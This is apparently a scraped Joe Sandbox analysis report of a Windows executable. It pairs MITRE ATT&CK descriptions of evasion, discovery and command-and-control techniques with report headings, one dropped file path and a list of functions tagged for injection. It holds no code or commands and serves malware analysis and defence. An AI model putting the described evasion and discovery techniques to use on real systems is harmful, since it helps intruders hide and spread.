Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1731043030539.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\9E4DF875-E953-E4A0-C5A4-989566D33EC8.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
1731043030539.exe

Function 00007FF6E53411CB Relevance: 96.8, APIs: 52, Strings: 3, Instructions: 571
threadstringprocessCOMMON

Function 00007FF6E5342318 Relevance: 25.7, APIs: 17, Instructions: 226
threadinjectionsynchronizationCOMMON

Function 00007FF6E5342700 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65
injectionmemorystringCOMMON

Function 00007FF6E5341BD1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
stringCOMMON

Function 00007FF6E5341CE0 Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Function 00007FF6E5342102 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76
filestringsynchronizationCOMMON

Function 00007FF6E534202E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
stringCOMMON

Function 00007FF6E5341DDE Relevance: 7.6, APIs: 5, Instructions: 63
stringCOMMON

Function 00007FF6E534224E Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Function 00007FF6E5341000 Relevance: 4.5, APIs: 3, Instructions: 18
COMMON

Function 00007FF6E5341F2F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19
stringCOMMON

Function 00007FF6E534104C Relevance: 10.6, APIs: 7, Instructions: 59
stringCOMMON

Function 00007FF6E5341F89 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
stringCOMMON

Function 00007FF6E5341D55 Relevance: 7.5, APIs: 5, Instructions: 43
serviceCOMMON